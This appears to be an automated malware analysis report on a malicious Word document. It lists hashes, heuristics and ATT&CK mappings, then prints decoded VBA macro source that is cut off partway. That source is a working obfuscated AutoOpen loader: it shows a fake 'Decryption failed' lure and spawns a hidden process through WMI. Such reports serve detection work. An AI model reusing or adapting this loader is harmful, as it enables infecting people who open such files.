Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1de94318f7810c1…

MALICIOUS

Office (OLE)

205.0 KB Created: 2018-04-25 10:12:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: d108c5cf5aefafc55348dad0748c3d86 SHA-1: 144ee8fd9501edd68a444c237b80e550fe4e1c3a SHA-256: f1de94318f7810c14430add3c348e442f9d9914cdcefcad907a28096794975f2
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains a heavily obfuscated VBA macro with an AutoOpen function, which is a common loader technique. The macro uses GetObject and potentially other execution methods to run arbitrary code, indicated by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics. The script attempts to decrypt and execute a payload, likely involving a second-stage download, but the exact URL or command is obfuscated. The presence of GetObject and the overall structure suggest a downloader or dropper.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4505 bytes
SHA-256: f44803d0129098abbf4ce06c96d26c2408893b96258a18d25e8aa74d5d4fe57a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"





Sub AutoOpen()
    Dim JCkxoRBPynMExQ As String
    Dim gsRJcVnw As Object
    Dim iztHUFEfusHPmmlWcqiCfcac As Integer
    Dim dzBMNIYcZgZdyZI As String
    Dim KWevsQeOpnmAPmRl As String
                Dim rngFirstParagraph As Range
Dim sID As String
    Set rngFirstParagraph = ActiveDocument.Paragraphs(1).Range
    With rngFirstParagraph
        .Delete
.InsertAfter Text:="Decryption failed" & Chr(10)
.InsertAfter Text:="ErrCode:0x05" & Chr(10)
        .InsertParagraphAfter
        With .Font
            .Name = "Century"
            .Size = 12
        End With
    End With
    iztHUFEfusHPmmlWcqiCfcac = 9716
    KWevsQeOpnmAPmRl = qvtIi("IHLAwWqOqoH")
    Set gsRJcVnw = GetObject(KWevsQeOpnmAPmRl)
    dzBMNIYcZgZdyZI = lzWLxBExN("IHLAwWqOqoH")
    dzBMNIYcZgZdyZI = JpeNvwoLgvTSxK(gsRJcVnw, dzBMNIYcZgZdyZI, iztHUFEfusHPmmlWcqiCfcac)
End Sub

Function lzWLxBExN(qFIlBjXodohTRCfHDRST As String) As String
    Dim MOZdAWNIwbLzgfJWlu As String
    Dim HraTLBiqV As String
    Dim jsBVeahIKWU As String
    jsBVeahIKWU = "vu}kxynkrr4k~k&3tuv&3}&nojjkt&3kti&PGH7GNOGhGG?GIOGgGH6GNWGiGH GJuGR}G|GNiGj}H9GI:GgmHnGMWGhGGzGM>GimG{GMSGh}HzGI>Gj}HrGMOGjWHvGI:G_}H|GM:G`mGoGJyGQGHUGM[Gj}GzGK>G_mHwGM[G_}H6GIGG[}H;GNSGjGHrGM6GRmHUG"
    Dim OajBM As String
    OajBM = "M[GjGG{GLiG`WHoGKSGhGHvGM[GhmH6GIqGRmHKGM>Gj}H{GM}Gh}HnGMWGXmHvGM}G`WGuGIWGjWH GM}GRGGqGM[GhmH8GJuG\GHrGM6GiGGxGIiG^GHJGM>GhWH}GN[GjGHrGNOGRmH8GMOGi}GtGIqGU}GqGNSGjGHnGNOGjGH\GNGGXmH|GM}G`GHrGNOGOGG?G"
    Dim qxHCvXFxjlcacDy As String
    qxHCvXFxjlcacDy = "IGGOmGqGK[GhmH8GJuGWWHWGLGGXGHHGLWGWWHiGK6GgWHpGNOGh}H GM>G`mH6GL}G\}HvGM:G`GH|GNiGi}HiGLSGjGHnGNOGjGGmGK6G`WH{GN[G^GHWGNOGh}HtGNOG_WHzGNSG^GHZGNWG_WH GNWGjWH}GIOGU}GqGNWG`WHzGNGGVWGoGIWGXWH{GN_GUmH6G"
    Dim kFhIJ As String
    kFhIJ = "M[GhWH}GL}GW}H|GM6GiGH7GNWG`WH GI:GjmHoGNSGOmG=GMSGi}HpGNOGgWH}GNWGOGGqGNWG`WHzGNGGU}HJGM>GiGH;GI6GYWH6GM[GhWGmGIWGjGHrGM6GiGGmGIWGi}H6GMKGimH6GL[GiGHMGM>GhGHqGM[GimG=GLOG`WHzGM>GjmHrGI6GYWH6GM[GhWGmG"
    Dim MRrpF As String
    MRrpF = "IWGjGHrGM6GiGG=GGCC"

    MOZdAWNIwbLzgfJWlu = jsBVeahIKWU & OajBM & qxHCvXFxjlcacDy & kFhIJ & MRrpF
    MOZdAWNIwbLzgfJWlu = YdoQa(MOZdAWNIwbLzgfJWlu)
    lzWLxBExN = MOZdAWNIwbLzgfJWlu
End Function

Function ZMxwQzU() As String
    Dim PloKBTmiiWQIpTTTLk As String
    PloKBTmiiWQIpTTTLk = YdoQa("}otsmszy@xuuz5ios|8")
    ZMxwQzU = PloKBTmiiWQIpTTTLk
End Function

Function JpeNvwoLgvTSxK(gJyAaTKda As Object, LYrDQtTPFRlS As String, shnIviWG As Integer) As String
    Dim mBeuYtzxKFJZdSQvxWdHosh As String
    Dim XetxVOaoktUrHUgMmMDYpku As Integer
    Dim YLNZqCoH As Integer
    Dim ulWhTLJ As Integer
    XetxVOaoktUrHUgMmMDYpku = 6
    mBeuYtzxKFJZdSQvxWdHosh = LYrDQtTPFRlS
    If (shnIviWG > XetxVOaoktUrHUgMmMDYpku) Then
        Set KzvmfJNmAskYGYTvumBkTV = GetObject(ZMxwQzU())
        Set RYNGHXPC = KzvmfJNmAskYGYTvumBkTV.Get(YdoQa("]ot98eVxuikyyYzgxz{v"))
        Set lRqRoVGNdqgKwBayUgKuAKk = RYNGHXPC.SpawnInstance_
        XetxVOaoktUrHUgMmMDYpku = shnIviWG - shnIviWG
        XetxVOaoktUrHUgMmMDYpku = XetxVOaoktUrHUgMmMDYpku + 12
        lRqRoVGNdqgKwBayUgKuAKk.ShowWindow = XetxVOaoktUrHUgMmMDYpku
        ulWhTLJ = gJyAaTKda.Create(mBeuYtzxKFJZdSQvxWdHosh, Null, lRqRoVGNdqgKwBayUgKuAKk, YLNZqCoH)
    End If
    mBeuYtzxKFJZdSQvxWdHosh = "sIxvKuspx"
    JpeNvwoLgvTSxK = mBeuYtzxKFJZdSQvxWdHosh
End Function

Function qvtIi(ttYImzolfjXPQ As String) As String
    Dim UCJVWDU As String
    UCJVWDU = YdoQa("}otsmszy@]ot98eVxuikyy")
    qvtIi = UCJVWDU
End Function


Function YdoQa(dzLwQuGAOBlnQ As String) As String
    Dim SPolvBuDKMPTKDs As Long
    Dim mXuOsnwWjVrqSp As String
    Dim MWCzHkgMsGNFqetTefS As Integer
    Dim int1 As Integer
    MWCzH
... (truncated)